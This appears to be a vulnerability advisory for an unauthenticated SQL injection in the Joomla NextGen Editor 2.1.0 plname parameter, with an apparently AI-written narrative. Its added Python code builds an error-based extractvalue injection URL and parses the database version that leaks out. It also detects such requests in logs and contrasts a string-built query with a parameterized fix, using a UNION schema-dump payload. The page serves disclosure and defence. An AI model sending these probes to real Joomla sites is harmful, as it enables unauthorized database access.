Joomla NextGen Editor 2.1.0 SQL Injection via plname Parameter
Description
Joomla NextGen Editor 2.1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL commands through the plname parameter. Attackers can send GET requests to index.php with option=com_nge&view=config and inject malicious SQL code in the plname parameter to extract sensitive database information.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Range: 2.1.0
Patches
Vulnerability mechanics
Root cause
"Missing input validation in the plname GET parameter allows SQL injection into the Joomla NextGen Editor component's database queries."
Attack vector
An unauthenticated attacker sends a crafted GET request to `index.php` with `option=com_nge&view=config` and injects SQL into the `plname` parameter [ref_id=1]. The payload is URL-encoded and combines SQL comment markers with extraction functions such as `extractvalue` and `concat` to retrieve database version information through the error the server returns [ref_id=1]. No authentication or session is required, so any client that can reach the web server can exploit it.
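As an added illustration of the request shape described above (example code written for this page, not taken from the advisory or the extension): it URL-encodes a GET probe for the `config` view, recovers the value a MySQL `extractvalue()` error echoes back, and flags matching requests in a constructed access-log sample. The exact payload text, the `~` marker, the `/index.php` path and the log lines are assumptions; the advisory does not reproduce its payload verbatim.

```python
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Assumed target path; the advisory names index.php with option=com_nge&view=config.
BASE_PATH = "/index.php"

# Assumed probe shape (the advisory's exact payload is not reproduced here).
# extractvalue() rejects a malformed XPath expression and echoes it in the
# MySQL error, so whatever concat() builds (a '~' marker, 0x7e, followed by
# version()) comes back in the error page. The trailing comment marker
# discards the remainder of the component's original query.
PROBE_PAYLOAD = "' and extractvalue(1,concat(0x7e,version()))-- -"


def build_probe_url(payload=PROBE_PAYLOAD):
    """URL-encoded request path for the com_nge config view with the payload in plname."""
    return BASE_PATH + "?" + urlencode({"option": "com_nge", "view": "config", "plname": payload})


# MySQL reports the injected expression as: XPATH syntax error: '~<value>'
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def extract_leaked_value(response_body):
    """Return the value leaked through extractvalue(), or None if the page shows no such error."""
    m = XPATH_ERR.search(response_body)
    return m.group(1) if m else None


# Detection side: SQL syntax that has no business in a plugin name.
SQL_TOKENS = re.compile(r"(?i)extractvalue|updatexml|concat\s*\(|union\s+select|--|/\*|#|'")


def is_suspicious_request(request_path):
    """True for a request to option=com_nge&view=config whose plname carries SQL syntax."""
    qs = parse_qs(urlparse(request_path).query)  # decodes %xx and '+' once
    if qs.get("option") != ["com_nge"] or qs.get("view") != ["config"]:
        return False
    return any(SQL_TOKENS.search(v) for v in qs.get("plname", []))


# Constructed Apache combined-log sample (not real traffic).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [20/Jun/2026:10:00:00 +0000] "GET /index.php?option=com_nge&view=config&plname=editor HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Jun/2026:10:00:01 +0000] "GET ' + build_probe_url() + ' HTTP/1.1" 500 1024',
    '198.51.100.4 - - [20/Jun/2026:10:00:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 2048',
]
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def flag_log_lines(lines):
    """Return (client_ip, status) for each log line that looks like a plname injection attempt."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_suspicious_request(m.group(2)):
            hits.append((m.group(1), m.group(3)))
    return hits


if __name__ == "__main__":
    print(build_probe_url())
    # Constructed error-page fragment of the kind a vulnerable MySQL-backed site returns.
    print(extract_leaked_value("Error: XPATH syntax error: '~8.0.36' in query"))
    print(flag_log_lines(SAMPLE_ACCESS_LOG))
```

The detector keys on the component and view first and only then on SQL syntax in `plname`, so a generic WAF signature is not needed to catch this specific vector; a 500 status on the flagged line is the usual tell that the error-based extraction actually fired.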
Affected code
The vulnerability is in the `plname` parameter processed by the `com_nge` component's `config` view within Joomla NextGen Editor 2.1.0 [ref_id=1]. The exact file path is not specified in the advisory, but the component's controller or model handling the `plname` input in a SQL query is the affected code path.
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] does not provide a remediation, but the fix would require sanitizing or parameterizing the `plname` input before it is used in SQL queries within the `com_nge` component's `config` view. Without a published patch, users must disable or remove the extension until a vendor update is available.
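The root-cause pattern beside the parameterized form a fix would need, as an added example for this page (not code from the extension, whose source the advisory does not show). SQLite stands in for MySQL, the `nge_plugins` table is a hypothetical schema, and a `UNION` payload substitutes for `extractvalue()`, which SQLite lacks; the quote-breakout and trailing-comment mechanics are the same.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the component's plugin table (hypothetical schema, in-memory SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nge_plugins (plname TEXT, config TEXT)")
    conn.executemany(
        "INSERT INTO nge_plugins VALUES (?, ?)",
        [("editor", '{"toolbar":"full"}'), ("uploader", '{"max_mb":8}')],
    )
    return conn


def load_config_vulnerable(conn, plname):
    """The root-cause pattern: the GET parameter is spliced straight into the SQL text."""
    sql = f"SELECT plname, config FROM nge_plugins WHERE plname = '{plname}'"
    return conn.execute(sql).fetchall()


def load_config_fixed(conn, plname):
    """Parameterized query: the value travels separately from the SQL and cannot alter its structure."""
    sql = "SELECT plname, config FROM nge_plugins WHERE plname = ?"
    return conn.execute(sql, (plname,)).fetchall()


# Closes the quoted literal, appends a UNION that reads the schema catalogue,
# and comments out the trailing quote, as the advisory's payload does with '-- '.
SCHEMA_LEAK_PAYLOAD = "x' UNION SELECT name, sql FROM sqlite_master-- -"


def run_both_paths(payload=SCHEMA_LEAK_PAYLOAD):
    """Run the same input through both code paths and return what each one returns."""
    conn = make_db()
    try:
        return {
            "vulnerable": load_config_vulnerable(conn, payload),
            "fixed": load_config_fixed(conn, payload),
            "legitimate": load_config_fixed(conn, "editor"),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for path, rows in run_both_paths().items():
        print(f"{path:11} -> {rows}")
```

In Joomla terms the fixed path corresponds to quoting the value with the database driver (`$db->quote()`) or binding it as a query parameter instead of concatenating it into the query string; that is an assumption about what a vendor fix would look like, since no patch has been published.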
Preconditions
- network: Attacker must be able to reach the Joomla web server over HTTP
- input: The plname GET parameter must reach the component's SQL query without filtering or parameterization
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.exploit-db.com/exploits/43365 (mitre, exploit)
- www.vulncheck.com/advisories/joomla-nextgen-editor-sql-injection-via-plname-parameter (mitre, third-party-advisory)
- extensions.joomla.org/extension/nextgen-editor/ (mitre, product)